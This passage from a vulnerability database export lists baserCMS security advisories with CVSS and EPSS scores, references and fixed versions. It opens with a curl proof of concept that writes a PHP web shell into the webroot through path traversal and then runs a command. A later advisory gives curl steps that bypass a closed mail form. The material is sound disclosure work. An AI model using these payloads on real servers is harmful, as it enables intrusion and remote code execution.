curl -X POST "http://target/baser/api/admin/bc-theme-file/theme_files/add.json" \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  -d '{
    "theme": "BcThemeSample",
    "plugin": "",
    "type": "layout",
    "path": "../../../../webroot/",
    "base_name": "shell",
    "ext": "php",
    "contents": "<?php system($_GET[\"cmd\"]); ?>"
  }'

# 3. RCE
curl "http://target/shell.php?cmd=id"
```

## Vulnerability Details

| Item | Details |
|------|---------|
| CWE | CWE-22: Path Traversal, CWE-73: External Control of File Name or Path |
| Impact | Arbitrary file write, Remote Code Execution (RCE) |
| Attack Prerequisites | Administrator privileges + API enabled (`USE_CORE_ADMIN_API=true`), or chaining with XSS, etc. |
| Reproducibility | High (PoC verified) |
| Test Environment | baserCMS 5.x (Docker environment) |

### Additional Notes on Attack Prerequisites

- **When API is enabled** (`USE_CORE_ADMIN_API=true`): API calls can be made externally using JWT token authentication. Direct exploitation is possible.
- **Default settings** (`USE_CORE_ADMIN_API=false`): Direct external API calls are prohibited. CSRF protection is also active, so this vulnerability alone cannot be exploited. An exploit chain involving XSS or similar is required.

## Recommended Fix

Rather than relying on simple string replacement or blacklist checks of input, the canonicalized path (using `realpath()`, etc.) should be verified to be within the theme base directory after file creation or immediately before writing. If the path falls outside the boundary, the operation should be rejected.

The specific implementation location and method are left to the project's design decisions.

## Comparison with Other CMS

WordPress's theme editor only allows editing within `wp-content/themes/` and does not permit writes outside that directory. [CVE-2019-8943](https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/) was reported as a path traversal vulnerability in `wp_crop_image()` that allowed writing cropped image output to an arbitrary directory by including `../` in the filename.

This vulnerability is not a matter of "administrators being able to execute arbitrary code" by design, but rather stems from a security boundary violation where "the theme editing function can write outside the theme directory (to webroot, config, etc.)."

## Resources

- OWASP Path Traversal: <https://owasp.org/www-community/attacks/Path_Traversal>
- WordPress RCE via Path Traversal (CVE-2019-8943): <https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/>
- Jira Path Traversal (CVE-2025-22167): <https://nvd.nist.gov/vuln/detail/CVE-2025-22167>

This advisory was translated from Japanese to English using GitHub Copilot.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30940
reference_id
reference_type
scores
0
value 0.00145
scoring_system epss
scoring_elements 0.34571
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30940
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30940
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30940
6
reference_url https://github.com/advisories/GHSA-c5c6-37vq-pjcq
reference_id GHSA-c5c6-37vq-pjcq
reference_type
scores
url https://github.com/advisories/GHSA-c5c6-37vq-pjcq
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30940, GHSA-c5c6-37vq-pjcq
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8buz-nsr9-3yge
9
url VCID-8ssu-umet-37bk
vulnerability_id VCID-8ssu-umet-37bk
summary
baserCMS is Vulnerable to Cross-site Scripting
baserCMS has DOM-based cross-site scripting in tag creation.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability
Malicious JavaScript may be executed when creating a tag.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page for more information.
https://basercms.net/security/JVN_94952030

### Credits

- quanlna2 (Le Nguyen Anh Quan)
- namdi (Do Ich Nam)
- minhnn42 (Nguyen Ngoc Minh)
- VCSLab - Viettel Cyber Security
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-32734
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-32734
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-32734
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-32734
6
reference_url https://github.com/advisories/GHSA-677c-xv24-crgx
reference_id GHSA-677c-xv24-crgx
reference_type
scores
url https://github.com/advisories/GHSA-677c-xv24-crgx
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-32734, GHSA-677c-xv24-crgx
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8ssu-umet-37bk
10
url VCID-9mf7-56fh-fyfk
vulnerability_id VCID-9mf7-56fh-fyfk
summary
Cross-site Scripting
An issue was discovered in baserCMS. In the Register New Category feature of the Upload menu, the category name can be used for XSS via the `data[UploaderCategory][name]` parameter to an `admin/uploader/uploader_categories/edit` URI.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-18943
reference_id
reference_type
scores
0
value 0.00305
scoring_system epss
scoring_elements 0.54037
published_at 2026-06-04T12:55:00Z
1
value 0.00305
scoring_system epss
scoring_elements 0.54093
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-18943
1
reference_url https://basercms.net/release/4_1_4
reference_id
reference_type
scores
url https://basercms.net/release/4_1_4
2
reference_url https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4
3
reference_url https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-18943
reference_id CVE-2018-18943
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-18943
fixed_packages
0
url pkg:composer/baserproject/basercms@4.1.4
purl pkg:composer/baserproject/basercms@4.1.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-ays7-6wvh-augt
9
vulnerability VCID-d1sf-cmct-zbh1
10
vulnerability VCID-d5gk-q2hh-kba5
11
vulnerability VCID-eq7f-n3g5-s3hu
12
vulnerability VCID-g56w-z9cx-5ygv
13
vulnerability VCID-ggv8-3v9t-mfea
14
vulnerability VCID-hpk4-a6tr-3ffe
15
vulnerability VCID-j37y-gws9-ake9
16
vulnerability VCID-jby7-s5ez-dqb3
17
vulnerability VCID-k575-suuf-7bhf
18
vulnerability VCID-k5qv-4yp3-zbgf
19
vulnerability VCID-khft-xvrw-g3dr
20
vulnerability VCID-kmpp-6j49-pqfz
21
vulnerability VCID-mfm9-gsh3-ubg8
22
vulnerability VCID-nxrf-64er-xbfx
23
vulnerability VCID-p695-t9ye-v3ga
24
vulnerability VCID-p6nr-eu91-53b4
25
vulnerability VCID-pd8c-9d7z-zkhg
26
vulnerability VCID-sqr4-v889-tff8
27
vulnerability VCID-twf5-bzba-gqb4
28
vulnerability VCID-u16w-rbuk-ybfs
29
vulnerability VCID-uedz-j2vn-cbea
30
vulnerability VCID-vqx2-hzju-r7et
31
vulnerability VCID-wvnk-63hy-ykeq
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-xxud-7jsh-bbc1
34
vulnerability VCID-y2sz-c6vb-pkdp
35
vulnerability VCID-zqd4-rdem-jfgk
36
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.4
aliases CVE-2018-18943, GHSA-fx2m-5m9v-jhgp
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9mf7-56fh-fyfk
11
url VCID-ays7-6wvh-augt
vulnerability_id VCID-ays7-6wvh-augt
summary
baserCMS vulnerable to stored Cross-site Scripting
Stored cross-site scripting vulnerability in User group management of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-42486
reference_id
reference_type
scores
0
value 0.00144
scoring_system epss
scoring_elements 0.3445
published_at 2026-06-04T12:55:00Z
1
value 0.00144
scoring_system epss
scoring_elements 0.34547
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-42486
1
reference_url https://basercms.net/security/JVN_53682526
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/
url https://basercms.net/security/JVN_53682526
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://jvn.jp/en/jp/JVN53682526/index.html
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/
url https://jvn.jp/en/jp/JVN53682526/index.html
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-42486
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-42486
5
reference_url https://github.com/advisories/GHSA-7w2v-35j3-xrm9
reference_id GHSA-7w2v-35j3-xrm9
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7w2v-35j3-xrm9
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.2
purl pkg:composer/baserproject/basercms@4.7.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-j37y-gws9-ake9
9
vulnerability VCID-jby7-s5ez-dqb3
10
vulnerability VCID-k5qv-4yp3-zbgf
11
vulnerability VCID-khft-xvrw-g3dr
12
vulnerability VCID-mfm9-gsh3-ubg8
13
vulnerability VCID-nxrf-64er-xbfx
14
vulnerability VCID-p695-t9ye-v3ga
15
vulnerability VCID-pd8c-9d7z-zkhg
16
vulnerability VCID-sqr4-v889-tff8
17
vulnerability VCID-u16w-rbuk-ybfs
18
vulnerability VCID-uedz-j2vn-cbea
19
vulnerability VCID-y2sz-c6vb-pkdp
20
vulnerability VCID-zqd4-rdem-jfgk
21
vulnerability VCID-zsgc-fnen-b7a6
22
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2
aliases CVE-2022-42486, GHSA-7w2v-35j3-xrm9
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ays7-6wvh-augt
12
url VCID-d1sf-cmct-zbh1
vulnerability_id VCID-d1sf-cmct-zbh1
summary
baserCMS has Mail Form Acceptance Bypass via Public API
### Summary
A public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.

### Details
In baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).

These checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()`  
(e.g. `plugins/bc-mail/src/Controller/MailController.php`).

However, the public API endpoint:

`plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()`

does not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.

The endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.

### PoC
1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. outside its acceptance period or explicitly closed).
2. Obtain a CSRF cookie by accessing the site root:
```
curl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/'
```
3. Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint:
```
curl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Referer: http://localhost/' \
  -H 'X-CSRF-Token: <csrf-token-from-cookie>' \
  -b /tmp/basercms_cookies.txt \
  --data-urlencode 'name_1=Test' \
  --data-urlencode 'name_2=User' \
  --data-urlencode 'email_1=test@example.com' \
  --data-urlencode 'email_2=test@example.com' \
  --data-urlencode 'category[]=資料請求' \
  --data-urlencode 'root=検索エンジン' \
  --data-urlencode 'message=API bypass test'
```
4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions.

### Impact
This is an access control / business logic bypass vulnerability.

Administrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30878
reference_id
reference_type
scores
0
value 0.0002
scoring_system epss
scoring_elements 0.05615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30878
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30878
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30878
6
reference_url https://github.com/advisories/GHSA-8cr7-r8qw-gp3c
reference_id GHSA-8cr7-r8qw-gp3c
reference_type
scores
url https://github.com/advisories/GHSA-8cr7-r8qw-gp3c
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30878, GHSA-8cr7-r8qw-gp3c
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-d1sf-cmct-zbh1
13
url VCID-d5gk-q2hh-kba5
vulnerability_id VCID-d5gk-q2hh-kba5
summary
Cross-site Scripting
baserCMS `content_info.php`, `content_options.php`, `content_related.php`, `index_list_tree.php`, `jquery.bcTree.js`.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-15154
reference_id
reference_type
scores
0
value 0.00784
scoring_system epss
scoring_elements 0.74124
published_at 2026-06-04T12:55:00Z
1
value 0.00784
scoring_system epss
scoring_elements 0.74157
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-15154
1
reference_url https://basercms.net/security/20200827
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/20200827
2
reference_url https://github.com/baserproject/basercms/commit/7f4b905b90954e394ec10dd35bad2a5dec505371
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/7f4b905b90954e394ec10dd35bad2a5dec505371
3
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-cpxc-67rc-c775
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-cpxc-67rc-c775
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-15154
reference_id CVE-2020-15154
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-15154
5
reference_url https://github.com/advisories/GHSA-cpxc-67rc-c775
reference_id GHSA-cpxc-67rc-c775
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-cpxc-67rc-c775
fixed_packages
0
url pkg:composer/baserproject/basercms@4.3.7
purl pkg:composer/baserproject/basercms@4.3.7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-ays7-6wvh-augt
9
vulnerability VCID-d1sf-cmct-zbh1
10
vulnerability VCID-eq7f-n3g5-s3hu
11
vulnerability VCID-g56w-z9cx-5ygv
12
vulnerability VCID-ggv8-3v9t-mfea
13
vulnerability VCID-hpk4-a6tr-3ffe
14
vulnerability VCID-j37y-gws9-ake9
15
vulnerability VCID-jby7-s5ez-dqb3
16
vulnerability VCID-k575-suuf-7bhf
17
vulnerability VCID-k5qv-4yp3-zbgf
18
vulnerability VCID-khft-xvrw-g3dr
19
vulnerability VCID-kmpp-6j49-pqfz
20
vulnerability VCID-mfm9-gsh3-ubg8
21
vulnerability VCID-nxrf-64er-xbfx
22
vulnerability VCID-p695-t9ye-v3ga
23
vulnerability VCID-pd8c-9d7z-zkhg
24
vulnerability VCID-sqr4-v889-tff8
25
vulnerability VCID-twf5-bzba-gqb4
26
vulnerability VCID-u16w-rbuk-ybfs
27
vulnerability VCID-uedz-j2vn-cbea
28
vulnerability VCID-wvnk-63hy-ykeq
29
vulnerability VCID-xpsb-2yux-g3cf
30
vulnerability VCID-xxud-7jsh-bbc1
31
vulnerability VCID-y2sz-c6vb-pkdp
32
vulnerability VCID-zqd4-rdem-jfgk
33
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.3.7
aliases CVE-2020-15154, GHSA-cpxc-67rc-c775
risk_score 3.3
exploitability 0.5
weighted_severity 6.6
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-d5gk-q2hh-kba5
14
url VCID-e4xa-jm9u-nked
vulnerability_id VCID-e4xa-jm9u-nked
summary
OS Command Injection
baserCMS allows remote authenticated attackers to execute arbitrary OS commands via unspecified vectors.
references
0
reference_url http://jvn.jp/en/jp/JVN67881316/index.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN67881316/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-0569
reference_id
reference_type
scores
0
value 0.01
scoring_system epss
scoring_elements 0.77368
published_at 2026-06-05T12:55:00Z
1
value 0.01
scoring_system epss
scoring_elements 0.77339
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-0569
2
reference_url https://basercms.net/security/JVN67881316
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN67881316
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-0569
reference_id CVE-2018-0569
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-0569
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.16
purl pkg:composer/baserproject/basercms@3.0.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
